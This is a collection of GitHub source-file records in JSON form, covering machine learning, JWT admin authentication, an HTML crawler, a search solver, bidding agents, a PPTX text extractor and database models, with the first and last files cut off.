tf.Variable(tf.zeros([n, 1]))\nb = tf.Variable(tf.zeros([1]))\n\n# Defining h(x), cost, and the optimizer\nhypothesis = tf.add(tf.matmul(X, W), b, name='hypothesis')\ncost = tf.reduce_mean(tf.square(hypothesis - Y), name='MSE')\noptimizer = tf.train.GradientDescentOptimizer(0.01).minimize(cost)\n\ninit = tf.global_variables_initializer()\nepochs = 500\nhistory = []\ntest_history = []\n\nwith tf.Session() as sess:\n # Initializing all variables\n sess.run(init)\n # Training\n for epoch in range(epochs):\n dummy, c = sess.run([optimizer, cost], feed_dict={X: X_train, Y: Y_train})\n history.append(c)\n #For plotting costVsIterations for testing\n ctest = sess.run(cost, feed_dict={X: X_test, Y: Y_test})\n test_history.append(ctest)\n\n # Making predictions on the training and testing sets \n train_predictions = sess.run(hypothesis, feed_dict={X: X_train, Y: Y_train})\n test_predictions = sess.run(hypothesis, feed_dict={X: X_test, Y: Y_test})\n\n # Saving the model to disk\n # tf.saved_model.simple_save(sess, 'lin-model-dir', \n # inputs={\"X\": X},\n # outputs={\"hypothesis\": hypothesis})\n\nprint(\"First 5 predictions on the training set.\")\nprint(train_predictions[:5])\n\nprint(\"Final cost:\", history[-1])\n\nplt.plot(history,label=\"training\")\nplt.plot(test_history,label=\"testing\")\nplt.legend(loc='upper right')\nplt.xlabel(\"Iterations\")\nplt.ylabel(\"Cost\")\nplt.title(\"Cost over Iterations\")\nplt.show()\n\n# Plotting the predictions\nmin_max = [[X_train.min()], [X_train.max()]]\nmin_max_pred = train_predictions[[np.argmin(X_train), np.argmax(X_train)]]\nplt.plot(min_max, min_max_pred)\nplt.scatter(X_train[:, 0], Y_train, label='Training set')\nplt.scatter(X_test[:, 0], Y_test, marker='*', label='Testing set')\nplt.xlabel(\"Size\")\nplt.ylabel(\"Price\")\nplt.title(\"Predictions\")\nplt.legend()\nplt.show()\n\n# Loading the saved model\n# print(\"\\nAfter reloading the model:\")\n# with tf.Session(graph=tf.Graph()) as sess:\n# tf.saved_model.loader.load(sess, ['serve'], 'lin-model-dir')\n# graph = tf.get_default_graph()\n# train_predictions = sess.run('hypothesis:0', feed_dict={'X:0': X_train})\n\n# print(\"First 5 predictions on the training set.\")\n# print(train_predictions[:5])","repo_name":"syncerax/Linear-Regression-in-TensorFlow","sub_path":"tf_lin_reg.py","file_name":"tf_lin_reg.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29199825566","text":"from datetime import datetime, timedelta\nfrom typing import Any, Optional\n\nfrom esmerald import Request\nfrom esmerald.exceptions import AuthenticationError\nfrom esmerald.security.jwt.token import Token\nfrom jose import JWSError, JWTError\nfrom sqladmin.authentication import AuthenticationBackend\nfrom starlette.responses import RedirectResponse\n\nDEFAULT_HEADER = \"Bearer\"\n\n\nclass BackendBaseAuthentication(AuthenticationBackend):\n \"\"\"\n Uses the AuthenticationProtocol from esmerald_admin assuming it is using the\n Esmerald contrib user and login into the admin.\n \"\"\"\n\n def __init__(self, secret_key: str, auth_model: Any, config: Any) -> None:\n super().__init__(secret_key)\n self.auth_model = auth_model\n self.config = config\n\n def generate_user_token(self, user: Any, time: Any = None) -> str:\n \"\"\"\n Generates the JWT token for the authenticated user.\n \"\"\"\n if not time:\n later = datetime.now() + timedelta(minutes=20)\n else:\n later = time\n\n token = Token(sub=user.id, exp=later)\n return token.encode(key=self.config.signing_key, algorithm=self.config.algorithm)\n\n def is_user_able_to_authenticate(self, user: Any) -> bool:\n \"\"\"\n Reject users with is_active=False. Custom user models that don't have\n that attribute are allowed.\n \"\"\"\n return getattr(user, \"is_active\", True)\n\n def is_user_staff_and_superuser(self, user: Any) -> bool:\n \"\"\"Checks if a user is staff and superuser to acess the admin\"\"\"\n return bool(user.is_staff and user.is_superuser)\n\n async def clear_session(self, request: Request) -> None:\n \"\"\"Clears the login sessions form the browser\"\"\"\n request.session.clear()\n\n async def logout(self, request: Request) -> bool: # type: ignore\n \"\"\"Logout from the admin\"\"\"\n await self.clear_session(request)\n return True\n\n async def authenticate(self, request: Request) -> Optional[RedirectResponse]: # type: ignore\n \"\"\"Authenticates the user and adds to the scope of the application\"\"\"\n token = request.session.get(\"token\")\n\n if not token:\n return RedirectResponse(request.url_for(\"admin:login\"), status_code=302)\n\n token = f\"{DEFAULT_HEADER} {token}\"\n token_partition = token.partition(\" \")\n token_type = token_partition[0]\n auth_token = token_partition[-1]\n\n if not token_type:\n await self.clear_session(request)\n return RedirectResponse(request.url_for(\"admin:login\"), status_code=302)\n\n try:\n token = Token.decode(\n token=auth_token,\n key=self.config.signing_key,\n algorithms=[self.config.algorithm],\n )\n except (JWSError, JWTError):\n await self.clear_session(request)\n return RedirectResponse(request.url_for(\"admin:login\"), status_code=302)\n\n user = await self.retrieve_user(token.sub)\n if not user:\n await self.clear_session(request)\n raise AuthenticationError(\"User not found.\")\n","repo_name":"tarsil/esmerald-admin","sub_path":"esmerald_admin/backends/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1437276890","text":"L = [1,2,3,4,5]\n\nL[1] # indexing is O(1)\nL.find() # O(N)\nL.append(6) # O(1)\n# insert into list is O(N)\nL.pop() # deleting from end is O(1)\nL.pop(1) # delete from middle is O(N)\n\n# O(N) - O notation means worst case.\n# you can get lucky and return early,\n# it's still O(N)\ndef search(x):\n for i in range(len(L)):\n if L[i] == x:\n return i\n return -1\n\n\n# \"O(2N)\" -> O(N)\ndef foo(N):\n for i in range(N):\n print(i)\n for i in range(N):\n print(i)\n\nd = {} # empty dict\nd = {1:2, 2:76, 3:568, 4:123} # dict int:int\nd = {\"asd\":2, \"qwyeuyhiu\":76, \"qwe\":568, \"qweopi\":123} # dict string:int\ns = {1, 2, 3} # set with 1, 2, 3 in it\ns = set() # empty set\n\nd[key] # indexing into dict is O(1)\nkey in d # search for exact key match in dict is O(1)\nd[new_key] = new_value # adding to dict is O(1)\ndel d[key] # removing from dict is O(1)\n\n# Two sum\ndef twoSum(self, nums, target):\n d = {}\n N = len(nums)\n for i in range(N):\n n = nums[i]\n x = target - n\n if x in d:\n return [i, d[x]]\n d[n] = i\n return [-1, -1] \n\n# Two Sum, O(N^2)\nfor i in range(len(L)):\n for j in range(i+1, len(L)):\n if L[i] + L[j] == target:\n return [i,j]\n","repo_name":"henryliuser/hliu-cp","sub_path":"other/asdqweiuwh.py","file_name":"asdqweiuwh.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"7459447319","text":"codigo = (input(\"Por favor ingrese su codigo de estudiante: \"))\r\nx = 0\r\nfor numero in codigo:\r\n sumar = int(numero)\r\n x+=sumar\r\n# ya tengo el valor de mi x\r\n\r\nimport numpy as np\r\nimport sympy as sp\r\n\r\n# DATOS\r\ny = x/3\r\nW_max = 0.005*x + 0.01*(y) \r\np = 0.05*x\r\nl1 = 0.05*x\r\nl2 = 1.5*l1\r\nl3 = 0.5*l1\r\nangulo_p_Grados = 45 \r\nangulo_p_Rad = (45 * np.pi)/180\r\n\r\n# PUNTUALIZACION DE CARGAS\r\nP1 = (l1*W_max)/2\r\nP2 = l2*W_max\r\nP3 = (l3*W_max)/2\r\nPx = p*(sp.cos(angulo_p_Rad))\r\nPy = p*sp.sin(angulo_p_Rad)\r\n\r\n# ESTATICA\r\n# sumatoria de fuerzas en y \r\nAy = P1 + P2 + P3 - Py\r\n# sumatoria de fuerzas en X \r\nAx = -Px\r\n# sumatoria de momentos en C \r\nMa = Ay*(l1+l2) - P1*(l2+(l1/3)) - P2*(l2/2) + P3*(l3/3) - Py*l3 \r\n\r\n\r\n# FUERZAS INTERNAS\r\n\r\n# Tramo AB 0 < X <= l1\r\nfrom sympy.abc import X\r\nW_AB = (W_max*X)/l1 \r\nV_AB = -(sp.integrate(W_AB,X)) + Ay\r\nM_AB = Ma + sp.integrate(V_AB,X)\r\n\r\nV_AB_Ev = V_AB.subs ({X: l1})\r\nM_AB_Ev = M_AB.subs ({X: l1})\r\n\r\n# Tramo BC 0 < X <= l2\r\nW_BC = W_max\r\nV_BC = -(sp.integrate(W_BC,X)) + V_AB_Ev\r\nM_BC = (sp.integrate(V_BC,X)) + M_AB_Ev\r\n\r\nV_BC_Ev = V_BC.subs ({X: l2})\r\nM_BC_Ev = M_BC.subs ({X: l2})\r\n\r\n# Tramo CD 0 < X <= l3\r\nW_CD = (-W_max*X)/l3\r\nV_CD = -(sp.integrate(W_CD,X)) + V_BC_Ev\r\nM_CD = (sp.integrate(V_CD,X)) + M_BC_Ev\r\n\r\nV_CD_Ev = V_CD.subs ({X: l3})\r\nM_CD_Ev = M_CD.subs ({X: l3})\r\n\r\n# Gráfica de cortante\r\nimport matplotlib.pyplot as plt\r\n\r\ndef tramo1(X):\r\n return(V_AB)\r\ndef tramo2(X):\r\n return(V_BC)\r\ndef tramo3(X):\r\n return(V_CD)\r\na=0\r\nb=l1\r\nc=l2\r\nd=l3\r\n\r\nX=np.linspace(a,d,500)\r\ny = np.piecewise(X,[(a<=X) & (X= self.max_tree_size:\n finished_cause = 'Finished cause tree too big'\n break\n if solved:\n finished_cause = 'Finished cause solved'\n break\n\n if self.use_adaptive_iterations == 'best-first':\n top_values = []\n\n for queue in node_queues:\n if queue.empty():\n value = 1e9 # infinity; never chosen as smaller is better\n else:\n best_elem = queue.get()\n (value, _, _) = best_elem\n queue.put(best_elem)\n top_values.append(value)\n\n current_queue_id = np.argmin(top_values)\n elif self.use_adaptive_iterations == 'force-longest':\n for i, queue in enumerate(node_queues):\n if not queue.empty():\n current_queue_id = i\n break\n else:\n # if the iterations limit is reached, move to the next queue\n if current_iterations >= self.iterations_list[current_queue_id]:\n current_queue_id = (current_queue_id + 1) % len(node_queues)\n current_iterations = 0\n\n # if current queue is empty, move to the next one\n while node_queues[current_queue_id].empty():\n print(f'Queue nb {current_queue_id} is empty.')\n current_queue_id = (current_queue_id + 1) % len(node_queues)\n current_iterations = 0\n\n current_iterations += 1\n\n # pop node from queue to expand\n current_node = node_queues[current_queue_id].get()[-1]\n reverse_order = True # We want goals returned by goal builder to be sorted from most to least probable.\n if current_node.depth < self.max_tree_depth:\n if isinstance(self.goal_builders[current_queue_id], list):\n builders_to_expand = self.goal_builders[current_queue_id]\n else:\n builders_to_expand = [self.goal_builders[current_queue_id]]\n\n goals = []\n\n for builder_id, builder in enumerate(builders_to_expand):\n new_goals, verificator_certain_number, verificator_trash_number, verificator_to_be_verified_later_number, ver_calls, cllp_calls, ver_samples_in_calls, cllp_samples_in_calls, all_node_computations_in_graph, subgoal_gen_calls = builder.build_goals(\n current_node.state,\n self.max_steps_list[builder_id],\n self.total_confidence_level,\n self.internal_confidence_level,\n self.max_goals,\n reverse_order)\n\n goals += new_goals\n\n total_verificator_certain_number += int(verificator_certain_number)\n total_verificator_trash_number += int(verificator_trash_number)\n total_verificator_to_be_verified_later_number += int(verificator_to_be_verified_later_number)\n total_ver_calls += ver_calls\n total_cllp_calls += cllp_calls\n total_ver_samples_in_calls += ver_samples_in_calls\n total_cllp_samples_in_calls += cllp_samples_in_calls\n total_nodes_with_computations_in_graph += all_node_computations_in_graph\n total_subgoal_gen_calls += subgoal_gen_calls\n\n if collect_data_for_graph_tracer:\n current_node.expanded = True\n\n all_goals_created += len(goals)\n expanded_nodes += 1\n created_new = 0\n\n for child_num, goal_proposition in enumerate(goals):\n current_goal_state = goal_proposition.goal_state\n current_goal_state_hashed = goal_proposition.hashed_goal\n path = goal_proposition.path\n\n if current_goal_state_hashed not in seen_hashed_states:\n created_new += 1\n seen_hashed_states.add(current_goal_state_hashed)\n new_node = SolverNode(current_goal_state, current_node, goal_proposition.p,\n current_node.depth + 1, child_num, path,\n goal_proposition.reachable_wrt_verificator,\n current_queue_id)\n\n current_node.add_child(new_node)\n tree_depth = max(tree_depth, new_node.depth)\n node_val = self.value_estimator.evaluate(new_node.state)\n new_node.set_value(node_val)\n for queue in node_queues:\n queue.put((-node_val, random.random(), new_node))\n tree_size += 1\n total_value_calls += 1\n\n\n # look for solution\n if self.solved(current_goal_state):\n solution.append(new_node)\n solved = True\n break\n\n else:\n if collect_data_for_graph_tracer:\n extra_edge_target = hashed_state_to_id[current_goal_state_hashed]\n tree_extra_edges.append(\n (current_node.id, extra_edge_target, readable_num(goal_proposition.p)))\n tree_metrics = {'nodes': tree_size,\n 'expanded_nodes': expanded_nodes,\n 'unexpanded_nodes': tree_size - expanded_nodes,\n 'max_depth': tree_depth,\n 'avg_n_goals': all_goals_created / expanded_nodes if expanded_nodes > 0 else 0,\n 'verificator_failed': 0, # To be filled during solution verification\n 'verificator_succeed': 0, # To be filled during solution verification\n 'verificator_certain_number': total_verificator_certain_number,\n 'verificator_trash_number': total_verificator_trash_number,\n 'verificator_verified_later_number': total_verificator_to_be_verified_later_number,\n 'verificator_first_fail_goal_index': -1, # To be filled during solution verification,\n 'ver_calls': total_ver_calls,\n 'ver_samples_in_calls': total_ver_samples_in_calls,\n 'cllp_calls': total_cllp_calls,\n 'cllp_samples_in_calls': total_cllp_samples_in_calls,\n 'total_nodes_with_computations_in_graph': total_nodes_with_computations_in_graph,\n 'value_calls': total_value_calls,\n 'subgoal_gen_calls': total_subgoal_gen_calls,\n }\n # print('Tree metrics', tree_metrics)\n\n additional_info = dict(\n finished_cause=finished_cause,\n tree_nodes=tree_nodes,\n tree_edges=tree_edges,\n tree_extra_edges=tree_extra_edges,\n # real_dist=np.array([np.sum(distances) if distances else 0 for distances in real_dist]),\n # real_called=real_called,\n generators_used=generators_used,\n )\n # for goal_builder in self.goal_builders:\n # goal_builder.dump_and_clear_data_for_verificator()\n if solved:\n node = solution[0]\n while node.parent is not None:\n solution.append(node.parent)\n node = node.parent\n\n if self.use_verificator_for_solving:\n print('Using verificator, so have to verify final trajectories',\n self.use_verificator_for_solving)\n # Check if solution makes sense\n initial_state = solution[-1]\n idx = 0\n for goal_state in solution[-2::-1]: # We also skip root\n if goal_state.reachable_wrt_verificator:\n raw_reached, calls, samples, node_computations = \\\n self.goal_builders[goal_state.generator_id]._are_accessible_from_given_state_wrt_policy(\n [goal_state], initial_state.state, self.max_steps_in_solution_stage, True)\n tree_metrics['cllp_calls'] += calls\n tree_metrics['cllp_samples_in_calls'] += samples\n tree_metrics['total_nodes_with_computations_in_graph'] += node_computations\n reachable = raw_reached[0]\n if not reachable:\n # NOTE: Abort on failure. Better try to backup.\n tree_metrics['verificator_failed'] = 1\n tree_metrics['verificator_first_fail_goal_index'] = idx\n return (None, tree_metrics, root, None, additional_info)\n initial_state = goal_state # Update of old initial state\n idx += 1\n tree_metrics['verificator_succeed'] = 1\n\n trajectory_actions = []\n for i, inter_goal in enumerate(solution):\n # print('inter_goal.path', i, len(solution), f'generator_{inter_goal.generator_id}', inter_goal.path, inter_goal.reachable_wrt_verificator)\n trajectory_actions += list(inter_goal.path)\n if inter_goal.generator_id is not None:\n generators_used[inter_goal.generator_id] += 1\n\n inter_goals = [node for node in reversed(solution)]\n additional_info['generators_used'] = generators_used\n\n return (inter_goals, tree_metrics, root, trajectory_actions, additional_info)\n else:\n return (None, tree_metrics, root, None, additional_info)\n","repo_name":"TomaszOdrzygozdz/AdaSubS_colab","sub_path":"solvers/iterative_solver_sokoban.py","file_name":"iterative_solver_sokoban.py","file_ext":"py","file_size_in_byte":15485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21831355958","text":"import datetime\nimport sys\n\nSEARCH_MAX = 100\n\n# These search strings are assumed to appear at least once, and have identical\n# information no matter how many times they appear\nDORT_SEARCH_STR = ['03_lnkHakem', 'hakemId=']\nAR2_SEARCH_STR = ['02_lnkHakem', 'hakemId=']\nAR1_SEARCH_STR = ['01_lnkHakem', 'hakemId=']\nHAKEM_SEARCH_STR = ['00_lnkHakem', 'hakemId=']\nAWAY_TEAM_SEARCH_STR = ['Takim2\"', 'kulupId=']\nHOME_TEAM_SEARCH_STR = ['Takim1\"', 'kulupId=']\nSTAD_SEARCH_STR = ['lnkStad', 'stadId=']\n\ndef break_down_pattern_one(html_output_str, search_str, end_character):\n # Format: search_str[0] + blablablabla + search_str[1] + ID + \"> + NAME + <\n # 18486\">BAK TUNCAY AKKIN(1. Yardmc Hakem)<\n # This pattern is very common, break this apart as:\n # 'hakemId='', '18486', 'BAK TUNCAY AKKIN(1. Yardmc Hakem)'\n\n # Find the first string index\n idx1 = html_output_str.find(search_str[0])\n if idx1 == -1:\n # If the search_str is not contained in the html file, return empty\n return [], ''\n else:\n # Find the second string index after the first one\n idx2 = html_output_str.find(search_str[1], idx1)\n # Reduce the html to a long substring the contains the information\n start_idx = idx2 + len(search_str[1])\n end_idx = idx2 + len(search_str[1]) + SEARCH_MAX\n long_string = html_output_str[start_idx:end_idx]\n\n # Now, find the information in this long substring\n count = 0\n id_str = ''\n name = ''\n while long_string[count] is not '\"':\n id_str = id_str + long_string[count]\n count = count+1\n # Next charachter is '\"', the second next must be '>'\n count = count + 1\n if long_string[count] is not '>':\n raise Exception('Something is wrong')\n # Start reading the stad name until '<'\n count = count + 1\n while long_string[count] is not end_character:\n name = name + long_string[count]\n count = count + 1\n # Cleanup extra spaces in the name\n name = ' '.join(name.split())\n return ([], '') if id_str=='' else (int(id_str), name)\n\ndef find_dort(html_output_str):\n # 03_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=19089\">TOLGA �ZKALFA(D�rd�nc� Hakem)<\n end_char = '('\n return break_down_pattern_one(html_output_str, DORT_SEARCH_STR, end_char)\n\ndef find_ar2(html_output_str):\n # 02_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=20658\">MUSTAFA HELVACIO�LU(2. Yard�mc� Hakem)<\n end_char = '('\n return break_down_pattern_one(html_output_str, AR2_SEARCH_STR, end_char)\n\ndef find_ar1(html_output_str):\n # 01_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=18549\">TOLGA KADAZ(1. Yard�mc� Hakem)<\n end_char = '('\n return break_down_pattern_one(html_output_str, AR1_SEARCH_STR, end_char)\n\ndef find_hakem(html_output_str):\n # 00_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=19553\">CUMHUR ALTAY(Hakem)<\n end_char = '('\n return break_down_pattern_one(html_output_str, HAKEM_SEARCH_STR, end_char)\n\ndef find_away_team(html_output_str):\n # Takim2\" href=\"Default.aspx?pageId=28&kulupId=3590\">BE��KTA� A.�.<\n end_char = '<'\n return break_down_pattern_one(html_output_str, \\\n AWAY_TEAM_SEARCH_STR, end_char)\n\ndef find_home_team(html_output_str):\n # Takim1\" href=\"Default.aspx?pageId=28&kulupId=110\">VESTEL MAN�SASPOR<\n end_char = '<'\n return break_down_pattern_one(html_output_str, \\\n HOME_TEAM_SEARCH_STR, end_char)\n\ndef find_stad(html_output_str):\n # stadId=11\">ANKARA 19 MAYIS<\n end_char = '<'\n return break_down_pattern_one(html_output_str, STAD_SEARCH_STR, end_char)\n","repo_name":"folmez/TFF_crawler","sub_path":"match_crawler/match_info_extractor_tools/break_down_ID_and_name.py","file_name":"break_down_ID_and_name.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29615177529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', # noqa\n TemplateView.as_view(template_name='pages/home.html'),\n name=\"home\"),\n url(r'^about/$',\n TemplateView.as_view(template_name='pages/about.html'),\n name=\"about\"),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n # User management\n url(r'^users/', include(\"users.urls\", namespace=\"users\")),\n url(r'^accounts/', include('allauth.urls')),\n\n # Uncomment the next line to enable avatars\n url(r'^avatar/', include('avatar.urls')),\n\n # Your stuff: custom urls go here\n url(r'^rank-preference/$', 'students.views.rank_preference', name=\"rank-preference\"),\n url(r'^update-group/$', 'students.views.update_group', name=\"update-group\"),\n url(r'^select-group/$', 'labs.views.select_group', name=\"select-group\"),\n url(r'^results-list/$', 'students.views.results_list', name=\"results-list\"),\n url(r'^lab-results/$', 'labs.views.lab_results', name=\"lab-results\"),\n url(r'^lab-slots/$', 'labs.views.lab_slots', name=\"lab-slots\"),\n\n\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"jericksanjuan/lab-student-draft","sub_path":"lab_student_draft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30675696670","text":"# ## Important libraries\n\nimport numpy as np\nimport cvxpy as cp\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import r2_score\nfrom tqdm import tqdm\nimport pickle\nimport re\n\n\n# function to normalize payoffs in [0,1]\n\ndef normalize_util(payoffs, min_payoff, max_payoff):\n if min_payoff == max_payoff:\n return payoffs\n payoff_range = max_payoff - min_payoff\n payoffs = np.maximum(payoffs, min_payoff)\n payoffs = np.minimum(payoffs, max_payoff)\n payoffs_scaled = (payoffs - min_payoff) / payoff_range\n return payoffs_scaled\n\n\nnormalize = np.vectorize(normalize_util)\n\n# parent class of all bidders (Random and GPMW)\n\nclass Bidder:\n def __init__(self, c_list, d_list, K, c_limit=None, d_limit=None, has_seed=False):\n self.K = K\n # if actions are provided\n if c_list and d_list:\n self.action_set = list(zip(c_list, d_list))\n self.cost = self.action_set[0]\n else:\n c_list = c_limit * np.random.sample(size=K-1)\n d_list = d_limit * np.random.sample(size=K-1)\n self.action_set = list(zip(c_list, d_list))\n # cost is a proper multiple of average bid function which is less than all of bid functions\n ratio_c = (c_list.min() / (2 * np.mean(c_list)))\n ratio_d = (d_list.min() / (2 * np.mean(d_list)))\n cost_ratio = min(ratio_c, ratio_d)\n self.cost = (np.mean(c_list) * cost_ratio, np.mean(d_list) * cost_ratio)\n \n self.weights = np.ones(K)\n self.history_payoff_profile = []\n self.history_action = []\n self.history_payoff = []\n self.cum_each_action = [0] * K\n self.played_action = None\n # to be able to reproduce exact same behavior\n self.has_seed = has_seed\n if self.has_seed:\n self.seed = np.random.randint(1, 10000)\n self.random_state = np.random.RandomState(seed=self.seed)\n\n # To clear stored data\n def restart(self):\n self.weights = np.ones(self.K)\n self.history_payoff_profile = []\n self.history_action = []\n self.history_payoff = []\n self.cum_each_action = [0] * self.K\n self.played_action = None\n if self.has_seed:\n self.random_state = np.random.RandomState(seed=self.seed)\n\n # choose action according to weights\n def choose_action(self):\n mixed_strategies = self.weights / np.sum(self.weights)\n if self.has_seed:\n choice = self.random_state.choice(len(self.action_set), p=mixed_strategies)\n else:\n choice = np.random.choice(len(self.action_set), p=mixed_strategies)\n return self.action_set[choice], choice\n \n# Bidder using Random- algorithm \n\nclass random_bidder(Bidder):\n def __init__(self, c_list, d_list, K, c_limit=None, d_limit=None, has_seed=False):\n super().__init__(c_list, d_list, K, c_limit=c_limit, d_limit=d_limit, has_seed=has_seed)\n self.type = 'random'\n\n# Bidder using GPMW Algorithm\n\nclass GPMW_bidder(Hedge_bidder):\n def __init__(self, c_list, d_list, K, max_payoff, T, beta, c_limit=None, d_limit=None, has_seed=False):\n super().__init__(c_list, d_list, K, max_payoff, T, c_limit=c_limit, d_limit=d_limit, has_seed=has_seed)\n self.type = 'GPMW'\n self.sigma = 0.01\n self.gpr = GaussianProcessRegressor(kernel=RBF(), alpha=self.sigma ** 2)\n self.gpr.optimizer = None\n self.input_history = []\n self.beta = beta\n self.max_payoff = max_payoff\n\n def restart(self):\n self.input_history = []\n super().restart()\n\n def update_weights(self, alloc_bidder, marginal_price):\n self.input_history.append([alloc_bidder, marginal_price, self.played_action[0], self.played_action[1]])\n self.gpr.fit(np.array(self.input_history), np.array(self.history_payoff))\n\n # all the input profiles that their payoffs need to be predicted\n input_predict = []\n for i in range(self.K):\n input_predict.append([alloc_bidder, marginal_price, self.action_set[i][0], self.action_set[i][1]])\n mean, std = self.gpr.predict(input_predict, return_std=True)\n payoffs = mean + self.beta * std\n super().update_weights(payoffs)\n\n","repo_name":"AregaGetaneh/Day_ahead-bidding-strategy","sub_path":"No_regret_learning_GPMW/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17225411440","text":"import io\nimport traceback\nfrom typing import IO\nfrom pptx import Presentation\nfrom pptx.util import Inches,Pt\nimport pytesseract\nfrom PIL import Image\nimport ai.get_response\n\n\n\nclass GetText:\n def __init__(self,file:IO):\n self.file = file\n\n\n async def pptx_method(self):\n text = \"\"\n presentation = Presentation(self.file)\n print(\"pptxmethod内部\")\n try:\n for slide in presentation.slides:\n for shape in slide.shapes:\n if hasattr(shape, 'text'):\n text += shape.text + '\\n'\n if shape.shape_type == 13:\n image = shape.image\n try:\n img = Image.open(io.BytesIO(image.blob))\n img = img.convert('L')\n img_text = pytesseract.image_to_string(img)\n text += img_text + '\\n'\n except Exception as e:\n print(\"有图片异常\")\n # 检查是否有text\n if not text:\n print(\"no text\")\n \n self.text = text\n #存数据库\n print(\"pptx发送ai\")\n result = await self.send_to_ai(self.text)\n return result \n \n except Exception as e:\n print(\"读取文件内容异常\")\n print(traceback.format_exc())\n return \"读取文件异常\"\n\n async def ppt_method(self):\n print(\"ppt file\")\n return \"无法解析ppt文件,正在加紧开发,请尝试使用其他网站转换文件格式或者使用PowerPoint将ppt文件改成pptx文件再使用\"\n \n async def send_to_ai(self,alltext):\n print(\"send to ai\")\n operate =ai.get_response.response(alltext)\n result = await operate.complete()\n return result\n \n\n\n","repo_name":"wangcham/ppt_killer","sub_path":"backend/service/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"16116028714","text":"\"\"\"\ndemonstration of the EEG burst detector\n\nJohn M. O' Toole, University College Cork\nStarted: 28-11-2019\nlast update: Time-stamp: <2019-12-11 12:17:07 (otoolej)>\n\"\"\"\nimport numpy as np\nfrom burst_detector import eeg_burst_detector, utils\nfrom matplotlib import pyplot as plt\n\n\n# 1. generate a test signal with impulsive noise\nN = 5000\nFs = 64\nx = utils.gen_impulsive_noise(N)\n\n\n# 2. run the burst detector on the test signal:\nburst_anno, svm_out = eeg_burst_detector.eeg_bursts(x, Fs)\n\n\n# 3. plot:\nttime = np.arange(N) / Fs\nfig, ax = plt.subplots(nrows=2, ncols=1, num=1, clear=True, sharex=True)\nax[0].plot(ttime, x, label='test signal')\nax[1].plot(ttime, burst_anno, label='burst annotation')\nax[1].plot(ttime, svm_out, label='SVM output')\nax[1].legend(loc='upper right')\nax[0].legend(loc='upper left')\nplt.xlabel('time (seconds)')\n\n","repo_name":"otoolej/py_burst_detector","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"965569342","text":"from sqlalchemy import Column, Table, Integer, ForeignKey, create_engine, String, Boolean, Numeric, DateTime, func\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\n\n__author__ = 'Greg'\n\nengine = create_engine('postgresql://postgres:postgres@localhost:5432/yolobid', echo=True)\nSession = sessionmaker(bind=engine)\nBase = declarative_base()\n\nteam_player = Table('team_player', Base.metadata,\n Column('team_id', Integer, ForeignKey('team.id')),\n Column('player_id', Integer, ForeignKey('player.id'))\n )\n\n\nclass TimestampMixin(object):\n created_date = Column(DateTime, default=func.now())\n\n\nclass Tournament(Base, TimestampMixin):\n \"\"\"Tournament object\"\"\"\n __tablename__ = 'tournament'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n region = Column(String)\n year = Column(Integer)\n season = Column(String)\n games = relationship('Game', backref=\"tournament\")\n data_sources = relationship('DataSource', backref=\"tournament\")\n\n def __str__(self):\n return 'id: {}, name: {}, external_location: {}, games: {}'.format\\\n (self.id, self.name, self.external_location, self.data_sources)\n\n\nclass DataSource(Base, TimestampMixin):\n \"\"\"DataSource object\"\"\"\n __tablename__ = 'data_source'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n external_location = Column(String)\n games = relationship('Game', backref=\"data_source\")\n tournament_id = Column(Integer, ForeignKey('tournament.id'))\n\n def __str__(self):\n return 'id: {}, name: {}, external_location: {}, games: {}'.format\\\n (self.id, self.name, self.external_location, self.games)\n\n\nclass Game(Base, TimestampMixin):\n \"\"\"Game object\"\"\"\n __tablename__ = 'game'\n id = Column(Integer, primary_key=True)\n game_length_minutes = Column(Numeric)\n external_id = Column(Integer)\n data_source_id = Column(Integer, ForeignKey('data_source.id'))\n tournament_id = Column(Integer, ForeignKey('tournament.id'))\n team_stats = relationship('TeamStats', backref='game')\n player_stats = relationship('PlayerStats', backref='game')\n\n\n\n def __str__(self):\n return 'id: {}, teams: {}, game_length: {}, external_id: {}, data_source_id: {}'.format\\\n (self.id, self.teams, self.game_length_minutes, self.external_id, self.data_source_id)\n\n\nclass Team(Base, TimestampMixin):\n \"\"\"Team object\"\"\"\n __tablename__ = 